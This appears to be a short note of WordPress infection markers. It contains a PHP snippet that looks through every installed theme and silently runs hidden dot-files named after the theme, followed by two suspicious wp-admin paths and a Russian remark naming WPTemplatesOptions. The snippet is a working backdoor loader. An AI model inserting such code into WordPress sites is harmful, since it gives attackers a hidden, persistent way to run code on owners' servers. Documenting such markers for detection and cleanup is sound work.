if( !class_exists( "WPTemplatesOptions" ) && function_exists( 'wp_get_themes' ) ) {
foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
$templates = get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php";
if( file_exists( $templates ) ) {
include_once( $templates );
}
}
}
if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php")) {
include_once
get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php";
}
/wp-admin/maint
/wp-admin/includes/
C кодом WPTemplatesOptions и тд